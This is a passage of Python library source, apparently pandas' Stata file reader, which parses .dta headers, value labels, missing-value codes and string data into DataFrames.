    ----------
    labname : string
        Name of the variable (column) the value labels are attached to
    value_labels : list of tuples
        Sorted (code, label) pairs that will be written to the dta file
Methods
-------
generate_value_label
"""
def __init__(self, catarray):
self.labname = catarray.name
categories = catarray.cat.categories
self.value_labels = list(zip(np.arange(len(categories)), categories))
self.value_labels.sort(key=lambda x: x[0])
self.text_len = np.int32(0)
self.off = []
self.val = []
self.txt = []
self.n = 0
# Compute lengths and setup lists of offsets and labels
for vl in self.value_labels:
category = vl[1]
if not isinstance(category, string_types):
category = str(category)
import warnings
warnings.warn(value_label_mismatch_doc.format(catarray.name),
ValueLabelTypeMismatch)
self.off.append(self.text_len)
self.text_len += len(category) + 1 # +1 for the padding
self.val.append(vl[0])
self.txt.append(category)
self.n += 1
if self.text_len > 32000:
raise ValueError('Stata value labels for a single variable must '
'have a combined length less than 32,000 '
'characters.')
# Ensure int32
self.off = np.array(self.off, dtype=np.int32)
self.val = np.array(self.val, dtype=np.int32)
# Total length
self.len = 4 + 4 + 4 * self.n + 4 * self.n + self.text_len
def _encode(self, s):
"""
        Python 3 compatibility shim
"""
if compat.PY3:
return s.encode(self._encoding)
else:
return s
def generate_value_label(self, byteorder, encoding):
"""
Parameters
----------
byteorder : str
Byte order of the output
encoding : str
File encoding
Returns
-------
value_label : bytes
Bytes containing the formatted value label
"""
self._encoding = encoding
bio = BytesIO()
null_string = '\x00'
null_byte = b'\x00'
# len
bio.write(struct.pack(byteorder + 'i', self.len))
# labname
labname = self._encode(_pad_bytes(self.labname[:32], 33))
bio.write(labname)
# padding - 3 bytes
for i in range(3):
bio.write(struct.pack('c', null_byte))
# value_label_table
# n - int32
bio.write(struct.pack(byteorder + 'i', self.n))
# textlen - int32
bio.write(struct.pack(byteorder + 'i', self.text_len))
# off - int32 array (n elements)
for offset in self.off:
bio.write(struct.pack(byteorder + 'i', offset))
# val - int32 array (n elements)
for value in self.val:
bio.write(struct.pack(byteorder + 'i', value))
# txt - Text labels, null terminated
for text in self.txt:
bio.write(self._encode(text + null_string))
bio.seek(0)
return bio.read()
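# Illustrative usage (a sketch, not pandas documentation): building the value
# label record for a categorical column before it is written to a dta file.
#
#   >>> s = pd.Series(['low', 'high', 'low'], dtype='category', name='grade')
#   >>> vl = StataValueLabel(s)
#   >>> vl.value_labels
#   [(0, 'high'), (1, 'low')]
#   >>> raw = vl.generate_value_label('<', 'latin-1')  # bytes for the file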
class StataMissingValue(StringMixin):
"""
An observation's missing value.
Parameters
-----------
value : int8, int16, int32, float32 or float64
The Stata missing value code
Attributes
----------
string : string
String representation of the Stata missing value
value : int8, int16, int32, float32 or float64
The original encoded missing value
Notes
-----
More information: <http://www.stata.com/help.cgi?missing>
    Integer missing values map the codes '.', '.a', ..., '.z' to the ranges
101 ... 127 (for int8), 32741 ... 32767 (for int16) and 2147483621 ...
2147483647 (for int32). Missing values for floating point data types are
more complex but the pattern is simple to discern from the following table.
np.float32 missing values (float in Stata)
0000007f .
0008007f .a
0010007f .b
...
00c0007f .x
00c8007f .y
00d0007f .z
np.float64 missing values (double in Stata)
000000000000e07f .
000000000001e07f .a
000000000002e07f .b
...
000000000018e07f .x
000000000019e07f .y
00000000001ae07f .z
"""
# Construct a dictionary of missing values
MISSING_VALUES = {}
bases = (101, 32741, 2147483621)
for b in bases:
# Conversion to long to avoid hash issues on 32 bit platforms #8968
MISSING_VALUES[compat.long(b)] = '.'
for i in range(1, 27):
MISSING_VALUES[compat.long(i + b)] = '.' + chr(96 + i)
float32_base = b'\x00\x00\x00\x7f'
increment = struct.unpack('<i', b'\x00\x08\x00\x00')[0]
for i in range(27):
value = struct.unpack('<f', float32_base)[0]
MISSING_VALUES[value] = '.'
if i > 0:
MISSING_VALUES[value] += chr(96 + i)
int_value = struct.unpack('<i', struct.pack('<f', value))[
0] + increment
float32_base = struct.pack('<i', int_value)
float64_base = b'\x00\x00\x00\x00\x00\x00\xe0\x7f'
increment = struct.unpack('q', b'\x00\x00\x00\x00\x00\x01\x00\x00')[0]
for i in range(27):
value = struct.unpack('<d', float64_base)[0]
MISSING_VALUES[value] = '.'
if i > 0:
MISSING_VALUES[value] += chr(96 + i)
int_value = struct.unpack('q', struct.pack('<d', value))[0] + increment
float64_base = struct.pack('q', int_value)
BASE_MISSING_VALUES = {'int8': 101,
'int16': 32741,
'int32': 2147483621,
'float32': struct.unpack('<f', float32_base)[0],
'float64': struct.unpack('<d', float64_base)[0]}
def __init__(self, value):
self._value = value
# Conversion to long to avoid hash issues on 32 bit platforms #8968
value = compat.long(value) if value < 2147483648 else float(value)
self._str = self.MISSING_VALUES[value]
string = property(lambda self: self._str,
doc="The Stata representation of the missing value: "
"'.', '.a'..'.z'")
value = property(lambda self: self._value,
doc='The binary representation of the missing value.')
def __unicode__(self):
return self.string
def __repr__(self):
# not perfect :-/
return "%s(%s)" % (self.__class__, self)
def __eq__(self, other):
return (isinstance(other, self.__class__) and
self.string == other.string and self.value == other.value)
@classmethod
def get_base_missing_value(cls, dtype):
if dtype == np.int8:
value = cls.BASE_MISSING_VALUES['int8']
elif dtype == np.int16:
value = cls.BASE_MISSING_VALUES['int16']
elif dtype == np.int32:
value = cls.BASE_MISSING_VALUES['int32']
elif dtype == np.float32:
value = cls.BASE_MISSING_VALUES['float32']
elif dtype == np.float64:
value = cls.BASE_MISSING_VALUES['float64']
else:
raise ValueError('Unsupported dtype')
return value
class StataParser(object):
_default_encoding = 'iso-8859-1'
def __init__(self, encoding):
self._encoding = encoding
# type code.
# --------------------
# str1 1 = 0x01
# str2 2 = 0x02
# ...
# str244 244 = 0xf4
# byte 251 = 0xfb (sic)
# int 252 = 0xfc
# long 253 = 0xfd
# float 254 = 0xfe
# double 255 = 0xff
# --------------------
# NOTE: the byte type seems to be reserved for categorical variables
# with a label, but the underlying variable is -127 to 100
# we're going to drop the label and cast to int
self.DTYPE_MAP = \
dict(
lzip(range(1, 245), ['a' + str(i) for i in range(1, 245)]) +
[
(251, np.int8),
(252, np.int16),
(253, np.int32),
(254, np.float32),
(255, np.float64)
]
)
self.DTYPE_MAP_XML = \
dict(
[
(32768, np.uint8), # Keys to GSO
(65526, np.float64),
(65527, np.float32),
(65528, np.int32),
(65529, np.int16),
(65530, np.int8)
]
)
self.TYPE_MAP = lrange(251) + list('bhlfd')
self.TYPE_MAP_XML = \
dict(
[
# Not really a Q, unclear how to handle byteswap
(32768, 'Q'),
(65526, 'd'),
(65527, 'f'),
(65528, 'l'),
(65529, 'h'),
(65530, 'b')
]
)
# NOTE: technically, some of these are wrong. there are more numbers
# that can be represented. it's the 27 ABOVE and BELOW the max listed
# numeric data type in [U] 12.2.2 of the 11.2 manual
float32_min = b'\xff\xff\xff\xfe'
float32_max = b'\xff\xff\xff\x7e'
float64_min = b'\xff\xff\xff\xff\xff\xff\xef\xff'
float64_max = b'\xff\xff\xff\xff\xff\xff\xdf\x7f'
self.VALID_RANGE = {
'b': (-127, 100),
'h': (-32767, 32740),
'l': (-2147483647, 2147483620),
'f': (np.float32(struct.unpack('<f', float32_min)[0]),
np.float32(struct.unpack('<f', float32_max)[0])),
'd': (np.float64(struct.unpack('<d', float64_min)[0]),
np.float64(struct.unpack('<d', float64_max)[0]))
}
self.OLD_TYPE_MAPPING = {
98: 251, # byte
105: 252, # int
108: 253, # long
102: 254 # float
# don't know old code for double
}
# These missing values are the generic '.' in Stata, and are used
# to replace nans
self.MISSING_VALUES = {
'b': 101,
'h': 32741,
'l': 2147483621,
'f': np.float32(struct.unpack('<f', b'\x00\x00\x00\x7f')[0]),
'd': np.float64(
struct.unpack('<d', b'\x00\x00\x00\x00\x00\x00\xe0\x7f')[0])
}
self.NUMPY_TYPE_MAP = {
'b': 'i1',
'h': 'i2',
'l': 'i4',
'f': 'f4',
'd': 'f8',
'Q': 'u8'
}
# Reserved words cannot be used as variable names
self.RESERVED_WORDS = ('aggregate', 'array', 'boolean', 'break',
'byte', 'case', 'catch', 'class', 'colvector',
'complex', 'const', 'continue', 'default',
'delegate', 'delete', 'do', 'double', 'else',
'eltypedef', 'end', 'enum', 'explicit',
'export', 'external', 'float', 'for', 'friend',
'function', 'global', 'goto', 'if', 'inline',
'int', 'local', 'long', 'NULL', 'pragma',
'protected', 'quad', 'rowvector', 'short',
'typedef', 'typename', 'virtual')
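# Illustrative note (sketch): the single-letter type codes above drive both
# range checks and missing-value handling. For an 'h' (int16) column, for
# example, VALID_RANGE['h'] == (-32767, 32740) and everything from 32741
# upwards is one of the 27 missing-value codes ('.', '.a', ..., '.z').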
class StataReader(StataParser, BaseIterator):
__doc__ = _stata_reader_doc
def __init__(self, path_or_buf, convert_dates=True,
convert_categoricals=True, index=None,
convert_missing=False, preserve_dtypes=True,
columns=None, order_categoricals=True,
encoding='iso-8859-1', chunksize=None):
super(StataReader, self).__init__(encoding)
self.col_sizes = ()
# Arguments to the reader (can be temporarily overridden in
# calls to read).
self._convert_dates = convert_dates
self._convert_categoricals = convert_categoricals
self._index = index
self._convert_missing = convert_missing
self._preserve_dtypes = preserve_dtypes
self._columns = columns
self._order_categoricals = order_categoricals
self._encoding = encoding
self._chunksize = chunksize
# State variables for the file
self._has_string_data = False
self._missing_values = False
self._can_read_value_labels = False
self._column_selector_set = False
self._value_labels_read = False
self._data_read = False
self._dtype = None
self._lines_read = 0
self._native_byteorder = _set_endianness(sys.byteorder)
if isinstance(path_or_buf, str):
path_or_buf, encoding, _ = get_filepath_or_buffer(
path_or_buf, encoding=self._default_encoding
)
if isinstance(path_or_buf, (str, compat.text_type, bytes)):
self.path_or_buf = open(path_or_buf, 'rb')
else:
# Copy to BytesIO, and ensure no encoding
contents = path_or_buf.read()
try:
contents = contents.encode(self._default_encoding)
except:
pass
self.path_or_buf = BytesIO(contents)
self._read_header()
def __enter__(self):
""" enter context manager """
return self
def __exit__(self, exc_type, exc_value, traceback):
""" exit context manager """
self.close()
def close(self):
""" close the handle if its open """
try:
self.path_or_buf.close()
except IOError:
pass
def _read_header(self):
first_char = self.path_or_buf.read(1)
if struct.unpack('c', first_char)[0] == b'<':
self._read_new_header(first_char)
else:
self._read_old_header(first_char)
self.has_string_data = len([x for x in self.typlist
if type(x) is int]) > 0
# calculate size of a data record
self.col_sizes = lmap(lambda x: self._calcsize(x), self.typlist)
# remove format details from %td
self.fmtlist = ["%td" if x.startswith("%td") else x
for x in self.fmtlist]
def _read_new_header(self, first_char):
# The first part of the header is common to 117 and 118.
self.path_or_buf.read(27) # stata_dta><header><release>
self.format_version = int(self.path_or_buf.read(3))
if self.format_version not in [117, 118]:
raise ValueError(_version_error)
self.path_or_buf.read(21) # </release><byteorder>
        self.byteorder = self.path_or_buf.read(3) == b"MSF" and '>' or '<'
self.path_or_buf.read(15) # </byteorder><K>
self.nvar = struct.unpack(self.byteorder + 'H',
self.path_or_buf.read(2))[0]
self.path_or_buf.read(7) # </K><N>
self.nobs = self._get_nobs()
self.path_or_buf.read(11) # </N><label>
self.data_label = self._get_data_label()
self.path_or_buf.read(19) # </label><timestamp>
self.time_stamp = self._get_time_stamp()
self.path_or_buf.read(26) # </timestamp></header><map>
self.path_or_buf.read(8) # 0x0000000000000000
self.path_or_buf.read(8) # position of <map>
self._seek_vartypes = struct.unpack(
self.byteorder + 'q', self.path_or_buf.read(8))[0] + 16
self._seek_varnames = struct.unpack(
self.byteorder + 'q', self.path_or_buf.read(8))[0] + 10
self._seek_sortlist = struct.unpack(
self.byteorder + 'q', self.path_or_buf.read(8))[0] + 10
self._seek_formats = struct.unpack(
self.byteorder + 'q', self.path_or_buf.read(8))[0] + 9
self._seek_value_label_names = struct.unpack(
self.byteorder + 'q', self.path_or_buf.read(8))[0] + 19
# Requires version-specific treatment
self._seek_variable_labels = self._get_seek_variable_labels()
self.path_or_buf.read(8) # <characteristics>
self.data_location = struct.unpack(
self.byteorder + 'q', self.path_or_buf.read(8))[0] + 6
self.seek_strls = struct.unpack(
self.byteorder + 'q', self.path_or_buf.read(8))[0] + 7
self.seek_value_labels = struct.unpack(
self.byteorder + 'q', self.path_or_buf.read(8))[0] + 14
self.typlist, self.dtyplist = self._get_dtypes(self._seek_vartypes)
self.path_or_buf.seek(self._seek_varnames)
self.varlist = self._get_varlist()
self.path_or_buf.seek(self._seek_sortlist)
self.srtlist = struct.unpack(
self.byteorder + ('h' * (self.nvar + 1)),
self.path_or_buf.read(2 * (self.nvar + 1))
)[:-1]
self.path_or_buf.seek(self._seek_formats)
self.fmtlist = self._get_fmtlist()
self.path_or_buf.seek(self._seek_value_label_names)
self.lbllist = self._get_lbllist()
self.path_or_buf.seek(self._seek_variable_labels)
self._variable_labels = self._get_variable_labels()
# Get data type information, works for versions 117-118.
def _get_dtypes(self, seek_vartypes):
self.path_or_buf.seek(seek_vartypes)
raw_typlist = [struct.unpack(self.byteorder + 'H',
self.path_or_buf.read(2))[0]
for i in range(self.nvar)]
def f(typ):
if typ <= 2045:
return typ
try:
return self.TYPE_MAP_XML[typ]
except KeyError:
raise ValueError("cannot convert stata types [{0}]".
format(typ))
typlist = [f(x) for x in raw_typlist]
def f(typ):
if typ <= 2045:
return str(typ)
try:
return self.DTYPE_MAP_XML[typ]
except KeyError:
raise ValueError("cannot convert stata dtype [{0}]"
.format(typ))
dtyplist = [f(x) for x in raw_typlist]
return typlist, dtyplist
def _get_varlist(self):
if self.format_version == 117:
b = 33
elif self.format_version == 118:
b = 129
return [self._null_terminate(self.path_or_buf.read(b))
for i in range(self.nvar)]
# Returns the format list
def _get_fmtlist(self):
if self.format_version == 118:
b = 57
elif self.format_version > 113:
b = 49
elif self.format_version > 104:
b = 12
else:
b = 7
return [self._null_terminate(self.path_or_buf.read(b))
for i in range(self.nvar)]
# Returns the label list
def _get_lbllist(self):
if self.format_version >= 118:
b = 129
elif self.format_version > 108:
b = 33
else:
b = 9
return [self._null_terminate(self.path_or_buf.read(b))
for i in range(self.nvar)]
def _get_variable_labels(self):
if self.format_version == 118:
vlblist = [self._decode(self.path_or_buf.read(321))
for i in range(self.nvar)]
elif self.format_version > 105:
vlblist = [self._null_terminate(self.path_or_buf.read(81))
for i in range(self.nvar)]
else:
vlblist = [self._null_terminate(self.path_or_buf.read(32))
for i in range(self.nvar)]
return vlblist
def _get_nobs(self):
if self.format_version == 118:
return struct.unpack(self.byteorder + 'Q',
self.path_or_buf.read(8))[0]
else:
return struct.unpack(self.byteorder + 'I',
self.path_or_buf.read(4))[0]
def _get_data_label(self):
if self.format_version == 118:
strlen = struct.unpack(self.byteorder + 'H',
self.path_or_buf.read(2))[0]
return self._decode(self.path_or_buf.read(strlen))
elif self.format_version == 117:
strlen = struct.unpack('b', self.path_or_buf.read(1))[0]
return self._null_terminate(self.path_or_buf.read(strlen))
elif self.format_version > 105:
return self._null_terminate(self.path_or_buf.read(81))
else:
return self._null_terminate(self.path_or_buf.read(32))
def _get_time_stamp(self):
if self.format_version == 118:
strlen = struct.unpack('b', self.path_or_buf.read(1))[0]
return self.path_or_buf.read(strlen).decode("utf-8")
elif self.format_version == 117:
strlen = struct.unpack('b', self.path_or_buf.read(1))[0]
return self._null_terminate(self.path_or_buf.read(strlen))
elif self.format_version > 104:
return self._null_terminate(self.path_or_buf.read(18))
else:
raise ValueError()
def _get_seek_variable_labels(self):
if self.format_version == 117:
            self.path_or_buf.read(8) # <variable_labels>, throw away
# Stata 117 data files do not follow the described format. This is
# a work around that uses the previous label, 33 bytes for each
# variable, 20 for the closing tag and 17 for the opening tag
return self._seek_value_label_names + (33 * self.nvar) + 20 + 17
elif self.format_version == 118:
return struct.unpack(self.byteorder + 'q',
self.path_or_buf.read(8))[0] + 17
else:
raise ValueError()
def _read_old_header(self, first_char):
self.format_version = struct.unpack('b', first_char)[0]
if self.format_version not in [104, 105, 108, 111, 113, 114, 115]:
raise ValueError(_version_error)
self.byteorder = struct.unpack('b', self.path_or_buf.read(1))[
0] == 0x1 and '>' or '<'
self.filetype = struct.unpack('b', self.path_or_buf.read(1))[0]
self.path_or_buf.read(1) # unused
self.nvar = struct.unpack(self.byteorder + 'H',
self.path_or_buf.read(2))[0]
self.nobs = self._get_nobs()
self.data_label = self._get_data_label()
self.time_stamp = self._get_time_stamp()
# descriptors
if self.format_version > 108:
typlist = [ord(self.path_or_buf.read(1))
for i in range(self.nvar)]
else:
buf = self.path_or_buf.read(self.nvar)
typlistb = np.frombuffer(buf, dtype=np.uint8)
typlist = []
for tp in typlistb:
if tp in self.OLD_TYPE_MAPPING:
typlist.append(self.OLD_TYPE_MAPPING[tp])
else:
typlist.append(tp - 127) # py2 string, py3 bytes
try:
self.typlist = [self.TYPE_MAP[typ] for typ in typlist]
except:
raise ValueError("cannot convert stata types [{0}]"
.format(','.join(str(x) for x in typlist)))
try:
self.dtyplist = [self.DTYPE_MAP[typ] for typ in typlist]
except:
raise ValueError("cannot convert stata dtypes [{0}]"
.format(','.join(str(x) for x in typlist)))
if self.format_version > 108:
self.varlist = [self._null_terminate(self.path_or_buf.read(33))
for i in range(self.nvar)]
else:
self.varlist = [self._null_terminate(self.path_or_buf.read(9))
for i in range(self.nvar)]
self.srtlist = struct.unpack(
self.byteorder + ('h' * (self.nvar + 1)),
self.path_or_buf.read(2 * (self.nvar + 1))
)[:-1]
self.fmtlist = self._get_fmtlist()
self.lbllist = self._get_lbllist()
self._variable_labels = self._get_variable_labels()
# ignore expansion fields (Format 105 and later)
# When reading, read five bytes; the last four bytes now tell you
# the size of the next read, which you discard. You then continue
# like this until you read 5 bytes of zeros.
if self.format_version > 104:
while True:
data_type = struct.unpack(self.byteorder + 'b',
self.path_or_buf.read(1))[0]
if self.format_version > 108:
data_len = struct.unpack(self.byteorder + 'i',
self.path_or_buf.read(4))[0]
else:
data_len = struct.unpack(self.byteorder + 'h',
self.path_or_buf.read(2))[0]
if data_type == 0:
break
self.path_or_buf.read(data_len)
# necessary data to continue parsing
self.data_location = self.path_or_buf.tell()
def _calcsize(self, fmt):
return (type(fmt) is int and fmt or
struct.calcsize(self.byteorder + fmt))
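    # Illustrative behaviour (comment added for clarity, not in the original
    # source): self._calcsize('i') returns 4 (the packed size of a 4-byte
    # int), while an integer argument such as self._calcsize(8) is returned
    # unchanged.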
def _decode(self, s):
s = s.partition(b"\0")[0]
return s.decode('utf-8')
def _null_terminate(self, s):
if compat.PY3 or self._encoding is not None:
# have bytes not strings, so must decode
s = s.partition(b"\0")[0]
return s.decode(self._encoding or self._default_encoding)
else:
null_byte = "\0"
try:
return s.lstrip(null_byte)[:s.index(null_byte)]
except:
return s
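    # Illustrative behaviour (comment added for clarity, not in the original
    # source): given the bytes b"abc\x00xyz", _null_terminate returns "abc",
    # i.e. everything before the first null byte (decoded when an encoding
    # is in use).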
def _read_value_labels(self):
if self.format_version <= 108:
# Value labels are not supported in version 108 and earlier.
return
if self._value_labels_read:
# Don't read twice
return
if self.format_version >= 117:
self.path_or_buf.seek(self.seek_value_labels)
else:
offset = self.nobs * self._dtype.itemsize
self.path_or_buf.seek(self.data_location + offset)
self._value_labels_read = True
self.value_label_dict = dict()
while True:
if self.format_version >= 117:
if self.path_or_buf.read(5) == b'</val': # <lbl>
break # end of value label table
slength = self.path_or_buf.read(4)
if not slength:
break # end of value label table (format < 117)
if self.format_version <= 117:
labname = self._null_terminate(self.path_or_buf.read(33))
else:
labname = self._decode(self.path_or_buf.read(129))
self.path_or_buf.read(3) # padding
n = struct.unpack(self.byteorder + 'I',
self.path_or_buf.read(4))[0]
txtlen = struct.unpack(self.byteorder + 'I',
self.path_or_buf.read(4))[0]
off = np.frombuffer(self.path_or_buf.read(4 * n),
dtype=self.byteorder + "i4",
count=n)
val = np.frombuffer(self.path_or_buf.read(4 * n),
dtype=self.byteorder + "i4",
count=n)
ii = np.argsort(off)
off = off[ii]
val = val[ii]
txt = self.path_or_buf.read(txtlen)
self.value_label_dict[labname] = dict()
for i in range(n):
end = off[i + 1] if i < n - 1 else txtlen
if self.format_version <= 117:
self.value_label_dict[labname][val[i]] = (
self._null_terminate(txt[off[i]:end]))
else:
self.value_label_dict[labname][val[i]] = (
self._decode(txt[off[i]:end]))
if self.format_version >= 117:
self.path_or_buf.read(6) # </lbl>
self._value_labels_read = True
def _read_strls(self):
self.path_or_buf.seek(self.seek_strls)
self.GSO = {0: ''}
while True:
if self.path_or_buf.read(3) != b'GSO':
break
if self.format_version == 117:
v_o = struct.unpack(self.byteorder + 'Q',
self.path_or_buf.read(8))[0]
else:
buf = self.path_or_buf.read(12)
# Only tested on little endian file on little endian machine.
if self.byteorder == '<':
buf = buf[0:2] + buf[4:10]
else:
buf = buf[0:2] + buf[6:]
v_o = struct.unpack('Q', buf)[0]
typ = struct.unpack('B', self.path_or_buf.read(1))[0]
length = struct.unpack(self.byteorder + 'I',
self.path_or_buf.read(4))[0]
va = self.path_or_buf.read(length)
if typ == 130:
encoding = 'utf-8'
if self.format_version == 117:
encoding = self._encoding or self._default_encoding
va = va[0:-1].decode(encoding)
self.GSO[v_o] = va
# legacy
@Appender('DEPRECATED: ' + _data_method_doc)
def data(self, **kwargs):
import warnings
warnings.warn("'data' is deprecated, use 'read' instead")
if self._data_read:
raise Exception("Data has already been read.")
self._data_read = True
return self.read(None, **kwargs)
def __next__(self):
return self.read(nrows=self._chunksize or 1)
def get_chunk(self, size=None):
"""
Reads lines from Stata file and returns as dataframe
Parameters
----------
size : int, defaults to None
Number of lines to read. If None, reads whole file.
Returns
-------
DataFrame
"""
if size is None:
size = self._chunksize
return self.read(nrows=size)
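    # Illustrative usage of the chunked interface (comment added for clarity,
    # not in the original source; assumes the enclosing class is pandas'
    # StataReader and that a local "example.dta" file exists):
    #
    #     reader = StataReader("example.dta", chunksize=1000)
    #     for chunk in reader:            # each chunk is a DataFrame
    #         handle(chunk)               # "handle" is a placeholder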
@Appender(_read_method_doc)
def read(self, nrows=None, convert_dates=None,
convert_categoricals=None, index=None,
convert_missing=None, preserve_dtypes=None,
columns=None, order_categoricals=None):
# Handle empty file or chunk. If reading incrementally raise
# StopIteration. If reading the whole thing return an empty
# data frame.
if (self.nobs == 0) and (nrows is None):
self._can_read_value_labels = True
self._data_read = True
self.close()
return DataFrame(columns=self.varlist)
# Handle options
if convert_dates is None:
convert_dates = self._convert_dates
if convert_categoricals is None:
convert_categoricals = self._convert_categoricals
if convert_missing is None:
convert_missing = self._convert_missing
if preserve_dtypes is None:
preserve_dtypes = self._preserve_dtypes
if columns is None:
columns = self._columns
if order_categoricals is None:
order_categoricals = self._order_categoricals
if nrows is None:
nrows = self.nobs
if (self.format_version >= 117) and (self._dtype is None):
self._can_read_value_labels = True
self._read_strls()
# Setup the dtype.
if self._dtype is None:
dtype = [] # Convert struct data types to numpy data type
for i, typ in enumerate(self.typlist):
if typ in self.NUMPY_TYPE_MAP:
dtype.append(('s' + str(i), self.byteorder +
self.NUMPY_TYPE_MAP[typ]))
else:
dtype.append(('s' + str(i), 'S' + str(typ)))
dtype = np.dtype(dtype)
self._dtype = dtype
# Read data
dtype = self._dtype
max_read_len = (self.nobs - self._lines_read) * dtype.itemsize
read_len = nrows * dtype.itemsize
read_len = min(read_len, max_read_len)
if read_len <= 0:
# Iterator has finished, should never be here unless
# we are reading the file incrementally
if convert_categoricals:
self._read_value_labels()
self.close()
raise StopIteration
offset = self._lines_read * dtype.itemsize
self.path_or_buf.seek(self.data_location + offset)
read_lines = min(nrows, self.nobs - self._lines_read)
data = np.frombuffer(self.path_or_buf.read(read_len), dtype=dtype,
count=read_lines)
self._lines_read += read_lines
if self._lines_read == self.nobs:
self._can_read_value_labels = True
self._data_read = True
# if necessary, swap the byte order to native here
if self.byteorder != self._native_byteorder:
data = data.byteswap().newbyteorder()
if convert_categoricals:
self._read_value_labels()
if len(data) == 0:
data = DataFrame(columns=self.varlist, index=index)
else:
data = DataFrame.from_records(data, index=index)
data.columns = self.varlist
# If index is not specified, use actual row number rather than
# restarting at 0 for each chunk.
if index is None:
ix = np.arange(self._lines_read - read_lines, self._lines_read)
data = data.set_index(ix)
if columns is not None:
try:
data = self._do_select_columns(data, columns)
except ValueError:
self.close()
raise
# Decode strings
for col, typ in zip(data, self.typlist):
if type(typ) is int:
data[col] = data[col].apply(
self._null_terminate, convert_dtype=True)
data = self._insert_strls(data)
cols_ = np.where(self.dtyplist)[0]
# Convert columns (if needed) to match input type
index = data.index
requires_type_conversion = False
data_formatted = []
for i in cols_:
if self.dtyplist[i] is not None:
col = data.columns[i]
dtype = data[col].dtype
if dtype != np.dtype(object) and dtype != self.dtyplist[i]:
requires_type_conversion = True
data_formatted.append(
(col, Series(data[col], index, self.dtyplist[i])))
else:
data_formatted.append((col, data[col]))
if requires_type_conversion:
data = DataFrame.from_items(data_formatted)
del data_formatted
self._do_convert_missing(data, convert_missing)
if convert_dates:
cols = np.where(lmap(lambda x: x in _date_formats,
self.fmtlist))[0]
for i in cols:
col = data.columns[i]
try:
data[col] = _stata_elapsed_date_to_datetime_vec(
data[col],
self.fmtlist[i])
except ValueError:
self.close()
raise
if convert_categoricals and self.format_version > 108:
data = self._do_convert_categoricals(data,
self.value_label_dict,
self.lbllist,
order_categoricals)
if not preserve_dtypes:
retyped_data = []
convert = False
for col in data:
dtype = data[col].dtype
if dtype in (np.float16, np.float32):
dtype = np.float64
convert = True
elif dtype in (np.int8, np.int16, np.int32):
dtype = np.int64
convert = True
retyped_data.append((col, data[col].astype(dtype)))
if convert:
data = DataFrame.from_items(retyped_data)
return data
def _do_convert_missing(self, data, convert_missing):
# Check for missing values, and replace if found
for i, colname in enumerate(data):
fmt = self.typlist[i]
if fmt not in self.VALID_RANGE:
continue
nmin, nmax = self.VALID_RANGE[fmt]
series = data[colname]
missing = np.logical_or(series < nmin, series > nmax)
if not missing.any():
continue
if convert_missing: # Replacement follows Stata notation
missing_loc = np.argwhere(missing)
umissing, umissing_loc = np.unique(series[missing],
return_inverse=True)
replacement = Series(series, dtype=np.object)
for j, um in enumerate(umissing):
missing_value = StataMissingValue(um)
loc = missing_loc[umissing_loc == j]
replacement.iloc[loc] = missing_value
else: # All replacements are identical
dtype = series.dtype
if dtype not in (np.float32, np.float64):
dtype = np.float64
replacement = Series(series, dtype=dtype)
replacement[missing] = np.nan
data[colname] = replacement
def _insert_strls(self, data):
if not hasattr(self, 'GSO') or len(self.GSO) == 0:
return data
for i, typ in enumerate(self.typlist):
if typ != 'Q':
continue
data.iloc[:, i] = [self.GSO[k] for k in data.iloc[:, i]]
return data
def _do_select_columns(self, data, columns):
if not self._column_selector_set:
column_set = set(columns)
if len(column_set) != len(columns):
raise ValueError('columns contains duplicate entries')
unmatched = column_set.difference(data.columns)
if unmatched:
raise ValueError('The following columns were not found in the '
'Stata data set: ' +
', '.join(list(unmatched)))
# Copy information for retained columns for later processing
dtyplist = []
typlist = []
fmtlist = []
lbllist = []
for col in columns:
i = data.columns.get_loc(col)
dtyplist.append(self.dtyplist[i])
typlist.append(self.typlist[i])
fmtlist.append(self.fmtlist[i])
lbllist.append(self.lbllist[i])
self.dtyplist = dtyplist
self.typlist = typlist
self.fmtlist = fmtlist
self.lbllist = lbllist
self._column_selector_set = True
return data[columns]
def _do_convert_categoricals(self, data, value_label_dict, lbllist,
order_categoricals):
"""
Converts categorical columns to Categorical type.
"""
value_labels = list(compat.iterkeys(value_label_dict))
cat_converted_data = []
for col, label in zip(data, lbllist):
if label in value_labels:
# Explicit call with ordered=True
cat_data = Categorical(data[col], ordered=order_categoricals)
categories = []
for category in cat_data.categories:
if category in value_label_dict[label]:
categories.append(value_label_dict[label][category])
else:
categories.append(category) # Partially labeled
try:
cat_data.categories = categories
except ValueError:
vc = Series(categories).value_counts()
repeats = list(vc.index[vc > 1])
repeats = '\n' + '-' * 80 + '\n'.join(repeats)
msg = 'Value labels for column {0} are not unique. The ' \
'repeated labels are:\n{1}'.format(col, repeats)
raise ValueError(msg)
# TODO: is the next line needed above in the data(...) method?
cat_data = Series(cat_data, index=data.index)
cat_converted_data.append((col, cat_data))
else:
cat_converted_data.append((col, data[col]))
data = DataFrame.from_items(cat_converted_data)
return data
def data_label(self):
"""Returns data label of Stata file"""
return self.data_label
def variable_labels(self):
"""Returns variable labels as a dict, associating each variable name
with corresponding label
"""
return dict(zip(self.varlist, self._variable_labels))
def value_labels(self):
"""Returns a dict, associating each variable name a dict, associating
each value its corresponding label
"""
if not self._value_labels_read:
self._read_value_labels()
return self.value_label_dict
def _open_file_binary_write(fname, encoding):
if hasattr(fname, 'write'):
# if 'b' not in fname.mode:
return fname
return open(fname, "wb")
def _set_endianness(endianness):
if endianness.lower() in ["<", "little"]:
return "<"
elif endianness.lower() in [">", "big"]:
return ">"
else: # pragma : no cover
raise ValueError("Endianness %s not understood" % endianness)
def _pad_bytes(name, length):
"""
    Takes a char string and pads it with null bytes until it is `length` characters long
"""
return name + "\x00" * (length - len(name))
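# For example (illustrative, not in the original source):
# _pad_bytes("abc", 5) returns "abc\x00\x00".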
def _convert_datetime_to_stata_type(fmt):
"""
Converts from one of the stata date formats to a type in TYPE_MAP
"""
if fmt in ["tc", "%tc", "td", "%td", "tw", "%tw", "tm", "%tm", "tq",
"%tq", "th", "%th", "ty", "%ty"]:
return np.float64 # Stata expects doubles for SIFs
else:
raise NotImplementedError("Format %s not implemented" % fmt)
def _maybe_convert_to_int_keys(convert_dates, varlist):
new_dict = {}
for key in convert_dates:
if not convert_dates[key].startswith("%"): # make sure proper fmts
convert_dates[key] = "%" + convert_dates[key]
if key in varlist:
new_dict.update({varlist.index(key): convert_dates[key]})
else:
if not isinstance(key, int):
raise ValueError("convert_dates key must be a "
"column or an integer")
new_dict.update({key: convert_dates[key]})
return new_dict
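# Illustrative behaviour (comment added for clarity, not in the original
# source): with convert_dates={"date": "td"} and varlist=["id", "date"],
# _maybe_convert_to_int_keys returns {1: "%td"}, i.e. keys become column
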